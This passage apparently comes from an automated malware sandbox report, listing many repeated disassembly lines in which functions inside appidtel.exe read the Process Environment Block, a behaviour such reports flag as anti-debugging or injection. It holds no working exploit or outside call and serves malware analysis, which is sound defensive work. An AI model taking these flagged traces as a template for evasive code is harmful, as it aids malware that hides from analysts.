            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340A2C3 mov eax, dword ptr fs:[00000030h]11_2_0340A2C3
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340A2C3 mov eax, dword ptr fs:[00000030h]11_2_0340A2C3
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340A2C3 mov eax, dword ptr fs:[00000030h]11_2_0340A2C3
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034092C5 mov eax, dword ptr fs:[00000030h]11_2_034092C5
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034092C5 mov eax, dword ptr fs:[00000030h]11_2_034092C5
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342F2D0 mov eax, dword ptr fs:[00000030h]11_2_0342F2D0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342F2D0 mov eax, dword ptr fs:[00000030h]11_2_0342F2D0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034102E1 mov eax, dword ptr fs:[00000030h]11_2_034102E1
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034102E1 mov eax, dword ptr fs:[00000030h]11_2_034102E1
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034102E1 mov eax, dword ptr fs:[00000030h]11_2_034102E1
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B12ED mov eax, dword ptr fs:[00000030h]11_2_034B12ED
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B12ED mov eax, dword ptr fs:[00000030h]11_2_034B12ED
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B12ED mov eax, dword ptr fs:[00000030h]11_2_034B12ED
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B12ED mov eax, dword ptr fs:[00000030h]11_2_034B12ED
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B12ED mov eax, dword ptr fs:[00000030h]11_2_034B12ED
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B12ED mov eax, dword ptr fs:[00000030h]11_2_034B12ED
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B12ED mov eax, dword ptr fs:[00000030h]11_2_034B12ED
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B12ED mov eax, dword ptr fs:[00000030h]11_2_034B12ED
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B12ED mov eax, dword ptr fs:[00000030h]11_2_034B12ED
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B12ED mov eax, dword ptr fs:[00000030h]11_2_034B12ED
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B12ED mov eax, dword ptr fs:[00000030h]11_2_034B12ED
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B12ED mov eax, dword ptr fs:[00000030h]11_2_034B12ED
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B12ED mov eax, dword ptr fs:[00000030h]11_2_034B12ED
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B12ED mov eax, dword ptr fs:[00000030h]11_2_034B12ED
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034D52E2 mov eax, dword ptr fs:[00000030h]11_2_034D52E2
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034BF2F8 mov eax, dword ptr fs:[00000030h]11_2_034BF2F8
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F92FF mov eax, dword ptr fs:[00000030h]11_2_033F92FF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343E284 mov eax, dword ptr fs:[00000030h]11_2_0343E284
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343E284 mov eax, dword ptr fs:[00000030h]11_2_0343E284
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03480283 mov eax, dword ptr fs:[00000030h]11_2_03480283
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03480283 mov eax, dword ptr fs:[00000030h]11_2_03480283
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03480283 mov eax, dword ptr fs:[00000030h]11_2_03480283
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034D5283 mov eax, dword ptr fs:[00000030h]11_2_034D5283
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343329E mov eax, dword ptr fs:[00000030h]11_2_0343329E
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343329E mov eax, dword ptr fs:[00000030h]11_2_0343329E
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034102A0 mov eax, dword ptr fs:[00000030h]11_2_034102A0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034102A0 mov eax, dword ptr fs:[00000030h]11_2_034102A0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034152A0 mov eax, dword ptr fs:[00000030h]11_2_034152A0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034152A0 mov eax, dword ptr fs:[00000030h]11_2_034152A0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034152A0 mov eax, dword ptr fs:[00000030h]11_2_034152A0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034152A0 mov eax, dword ptr fs:[00000030h]11_2_034152A0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034972A0 mov eax, dword ptr fs:[00000030h]11_2_034972A0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034972A0 mov eax, dword ptr fs:[00000030h]11_2_034972A0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034962A0 mov eax, dword ptr fs:[00000030h]11_2_034962A0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034962A0 mov ecx, dword ptr fs:[00000030h]11_2_034962A0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034962A0 mov eax, dword ptr fs:[00000030h]11_2_034962A0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034962A0 mov eax, dword ptr fs:[00000030h]11_2_034962A0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034962A0 mov eax, dword ptr fs:[00000030h]11_2_034962A0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034962A0 mov eax, dword ptr fs:[00000030h]11_2_034962A0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C92A6 mov eax, dword ptr fs:[00000030h]11_2_034C92A6
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C92A6 mov eax, dword ptr fs:[00000030h]11_2_034C92A6
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C92A6 mov eax, dword ptr fs:[00000030h]11_2_034C92A6
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C92A6 mov eax, dword ptr fs:[00000030h]11_2_034C92A6
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FB2D3 mov eax, dword ptr fs:[00000030h]11_2_033FB2D3
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FB2D3 mov eax, dword ptr fs:[00000030h]11_2_033FB2D3
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FB2D3 mov eax, dword ptr fs:[00000030h]11_2_033FB2D3
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034892BC mov eax, dword ptr fs:[00000030h]11_2_034892BC
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034892BC mov eax, dword ptr fs:[00000030h]11_2_034892BC
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034892BC mov ecx, dword ptr fs:[00000030h]11_2_034892BC
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034892BC mov ecx, dword ptr fs:[00000030h]11_2_034892BC
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FB136 mov eax, dword ptr fs:[00000030h]11_2_033FB136
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FB136 mov eax, dword ptr fs:[00000030h]11_2_033FB136
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FB136 mov eax, dword ptr fs:[00000030h]11_2_033FB136
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FB136 mov eax, dword ptr fs:[00000030h]11_2_033FB136
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03494144 mov eax, dword ptr fs:[00000030h]11_2_03494144
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03494144 mov eax, dword ptr fs:[00000030h]11_2_03494144
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03494144 mov ecx, dword ptr fs:[00000030h]11_2_03494144
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03494144 mov eax, dword ptr fs:[00000030h]11_2_03494144
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03494144 mov eax, dword ptr fs:[00000030h]11_2_03494144
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03407152 mov eax, dword ptr fs:[00000030h]11_2_03407152
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03406154 mov eax, dword ptr fs:[00000030h]11_2_03406154
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03406154 mov eax, dword ptr fs:[00000030h]11_2_03406154
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034D5152 mov eax, dword ptr fs:[00000030h]11_2_034D5152
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03499179 mov eax, dword ptr fs:[00000030h]11_2_03499179
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FF172 mov eax, dword ptr fs:[00000030h]11_2_033FF172
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034AA118 mov ecx, dword ptr fs:[00000030h]11_2_034AA118
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034AA118 mov eax, dword ptr fs:[00000030h]11_2_034AA118
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034AA118 mov eax, dword ptr fs:[00000030h]11_2_034AA118
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034AA118 mov eax, dword ptr fs:[00000030h]11_2_034AA118
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C0115 mov eax, dword ptr fs:[00000030h]11_2_034C0115
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03430124 mov eax, dword ptr fs:[00000030h]11_2_03430124
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FC156 mov eax, dword ptr fs:[00000030h]11_2_033FC156
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03401131 mov eax, dword ptr fs:[00000030h]11_2_03401131
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03401131 mov eax, dword ptr fs:[00000030h]11_2_03401131
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F9148 mov eax, dword ptr fs:[00000030h]11_2_033F9148
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F9148 mov eax, dword ptr fs:[00000030h]11_2_033F9148
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F9148 mov eax, dword ptr fs:[00000030h]11_2_033F9148
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033F9148 mov eax, dword ptr fs:[00000030h]11_2_033F9148
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034D51CB mov eax, dword ptr fs:[00000030h]11_2_034D51CB
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C61C3 mov eax, dword ptr fs:[00000030h]11_2_034C61C3
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C61C3 mov eax, dword ptr fs:[00000030h]11_2_034C61C3
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343D1D0 mov eax, dword ptr fs:[00000030h]11_2_0343D1D0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343D1D0 mov ecx, dword ptr fs:[00000030h]11_2_0343D1D0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0347E1D0 mov eax, dword ptr fs:[00000030h]11_2_0347E1D0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0347E1D0 mov eax, dword ptr fs:[00000030h]11_2_0347E1D0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0347E1D0 mov ecx, dword ptr fs:[00000030h]11_2_0347E1D0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0347E1D0 mov eax, dword ptr fs:[00000030h]11_2_0347E1D0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0347E1D0 mov eax, dword ptr fs:[00000030h]11_2_0347E1D0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FA197 mov eax, dword ptr fs:[00000030h]11_2_033FA197
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FA197 mov eax, dword ptr fs:[00000030h]11_2_033FA197
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FA197 mov eax, dword ptr fs:[00000030h]11_2_033FA197
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034D61E5 mov eax, dword ptr fs:[00000030h]11_2_034D61E5
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034251EF mov eax, dword ptr fs:[00000030h]11_2_034251EF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034251EF mov eax, dword ptr fs:[00000030h]11_2_034251EF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034251EF mov eax, dword ptr fs:[00000030h]11_2_034251EF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034251EF mov eax, dword ptr fs:[00000030h]11_2_034251EF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034251EF mov eax, dword ptr fs:[00000030h]11_2_034251EF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034251EF mov eax, dword ptr fs:[00000030h]11_2_034251EF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034251EF mov eax, dword ptr fs:[00000030h]11_2_034251EF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034251EF mov eax, dword ptr fs:[00000030h]11_2_034251EF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034251EF mov eax, dword ptr fs:[00000030h]11_2_034251EF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034251EF mov eax, dword ptr fs:[00000030h]11_2_034251EF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034251EF mov eax, dword ptr fs:[00000030h]11_2_034251EF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034251EF mov eax, dword ptr fs:[00000030h]11_2_034251EF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034251EF mov eax, dword ptr fs:[00000030h]11_2_034251EF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034051ED mov eax, dword ptr fs:[00000030h]11_2_034051ED
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034301F8 mov eax, dword ptr fs:[00000030h]11_2_034301F8
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03440185 mov eax, dword ptr fs:[00000030h]11_2_03440185
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034BC188 mov eax, dword ptr fs:[00000030h]11_2_034BC188
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034BC188 mov eax, dword ptr fs:[00000030h]11_2_034BC188
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03457190 mov eax, dword ptr fs:[00000030h]11_2_03457190
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0348019F mov eax, dword ptr fs:[00000030h]11_2_0348019F
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0348019F mov eax, dword ptr fs:[00000030h]11_2_0348019F
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0348019F mov eax, dword ptr fs:[00000030h]11_2_0348019F
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0348019F mov eax, dword ptr fs:[00000030h]11_2_0348019F
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B11A4 mov eax, dword ptr fs:[00000030h]11_2_034B11A4
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B11A4 mov eax, dword ptr fs:[00000030h]11_2_034B11A4
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B11A4 mov eax, dword ptr fs:[00000030h]11_2_034B11A4
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034B11A4 mov eax, dword ptr fs:[00000030h]11_2_034B11A4
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341B1B0 mov eax, dword ptr fs:[00000030h]11_2_0341B1B0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03402050 mov eax, dword ptr fs:[00000030h]11_2_03402050
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342B052 mov eax, dword ptr fs:[00000030h]11_2_0342B052
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034A705E mov ebx, dword ptr fs:[00000030h]11_2_034A705E
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034A705E mov eax, dword ptr fs:[00000030h]11_2_034A705E
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FA020 mov eax, dword ptr fs:[00000030h]11_2_033FA020
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FC020 mov eax, dword ptr fs:[00000030h]11_2_033FC020
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0348106E mov eax, dword ptr fs:[00000030h]11_2_0348106E
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034D5060 mov eax, dword ptr fs:[00000030h]11_2_034D5060
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03411070 mov eax, dword ptr fs:[00000030h]11_2_03411070
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03411070 mov ecx, dword ptr fs:[00000030h]11_2_03411070
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03411070 mov eax, dword ptr fs:[00000030h]11_2_03411070
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03411070 mov eax, dword ptr fs:[00000030h]11_2_03411070
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03411070 mov eax, dword ptr fs:[00000030h]11_2_03411070
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03411070 mov eax, dword ptr fs:[00000030h]11_2_03411070
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03411070 mov eax, dword ptr fs:[00000030h]11_2_03411070
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03411070 mov eax, dword ptr fs:[00000030h]11_2_03411070
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03411070 mov eax, dword ptr fs:[00000030h]11_2_03411070
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03411070 mov eax, dword ptr fs:[00000030h]11_2_03411070
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03411070 mov eax, dword ptr fs:[00000030h]11_2_03411070
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03411070 mov eax, dword ptr fs:[00000030h]11_2_03411070
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03411070 mov eax, dword ptr fs:[00000030h]11_2_03411070
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342C073 mov eax, dword ptr fs:[00000030h]11_2_0342C073
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0347D070 mov ecx, dword ptr fs:[00000030h]11_2_0347D070
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341E016 mov eax, dword ptr fs:[00000030h]11_2_0341E016
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341E016 mov eax, dword ptr fs:[00000030h]11_2_0341E016
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341E016 mov eax, dword ptr fs:[00000030h]11_2_0341E016
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0341E016 mov eax, dword ptr fs:[00000030h]11_2_0341E016
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C903E mov eax, dword ptr fs:[00000030h]11_2_034C903E
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C903E mov eax, dword ptr fs:[00000030h]11_2_034C903E
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C903E mov eax, dword ptr fs:[00000030h]11_2_034C903E
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C903E mov eax, dword ptr fs:[00000030h]11_2_034C903E
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034170C0 mov eax, dword ptr fs:[00000030h]11_2_034170C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034170C0 mov ecx, dword ptr fs:[00000030h]11_2_034170C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034170C0 mov ecx, dword ptr fs:[00000030h]11_2_034170C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034170C0 mov eax, dword ptr fs:[00000030h]11_2_034170C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034170C0 mov ecx, dword ptr fs:[00000030h]11_2_034170C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034170C0 mov ecx, dword ptr fs:[00000030h]11_2_034170C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034170C0 mov eax, dword ptr fs:[00000030h]11_2_034170C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034170C0 mov eax, dword ptr fs:[00000030h]11_2_034170C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034170C0 mov eax, dword ptr fs:[00000030h]11_2_034170C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034170C0 mov eax, dword ptr fs:[00000030h]11_2_034170C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034170C0 mov eax, dword ptr fs:[00000030h]11_2_034170C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034170C0 mov eax, dword ptr fs:[00000030h]11_2_034170C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034170C0 mov eax, dword ptr fs:[00000030h]11_2_034170C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034170C0 mov eax, dword ptr fs:[00000030h]11_2_034170C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034170C0 mov eax, dword ptr fs:[00000030h]11_2_034170C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034170C0 mov eax, dword ptr fs:[00000030h]11_2_034170C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034170C0 mov eax, dword ptr fs:[00000030h]11_2_034170C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034170C0 mov eax, dword ptr fs:[00000030h]11_2_034170C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0347D0C0 mov eax, dword ptr fs:[00000030h]11_2_0347D0C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0347D0C0 mov eax, dword ptr fs:[00000030h]11_2_0347D0C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034D50D9 mov eax, dword ptr fs:[00000030h]11_2_034D50D9
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034820DE mov eax, dword ptr fs:[00000030h]11_2_034820DE
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034290DB mov eax, dword ptr fs:[00000030h]11_2_034290DB
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034250E4 mov eax, dword ptr fs:[00000030h]11_2_034250E4
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034250E4 mov ecx, dword ptr fs:[00000030h]11_2_034250E4
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034080E9 mov eax, dword ptr fs:[00000030h]11_2_034080E9
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FD08D mov eax, dword ptr fs:[00000030h]11_2_033FD08D
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034420F0 mov ecx, dword ptr fs:[00000030h]11_2_034420F0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0340208A mov eax, dword ptr fs:[00000030h]11_2_0340208A
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FC0F0 mov eax, dword ptr fs:[00000030h]11_2_033FC0F0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342D090 mov eax, dword ptr fs:[00000030h]11_2_0342D090
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0342D090 mov eax, dword ptr fs:[00000030h]11_2_0342D090
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03405096 mov eax, dword ptr fs:[00000030h]11_2_03405096
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_033FA0E3 mov ecx, dword ptr fs:[00000030h]11_2_033FA0E3
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343909C mov eax, dword ptr fs:[00000030h]11_2_0343909C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C60B8 mov eax, dword ptr fs:[00000030h]11_2_034C60B8
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034C60B8 mov ecx, dword ptr fs:[00000030h]11_2_034C60B8
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03413740 mov eax, dword ptr fs:[00000030h]11_2_03413740
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03413740 mov eax, dword ptr fs:[00000030h]11_2_03413740
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03413740 mov eax, dword ptr fs:[00000030h]11_2_03413740
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034D3749 mov eax, dword ptr fs:[00000030h]11_2_034D3749
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0343674D mov esi, dword ptr fs:[00000030h]11_2_0343674D
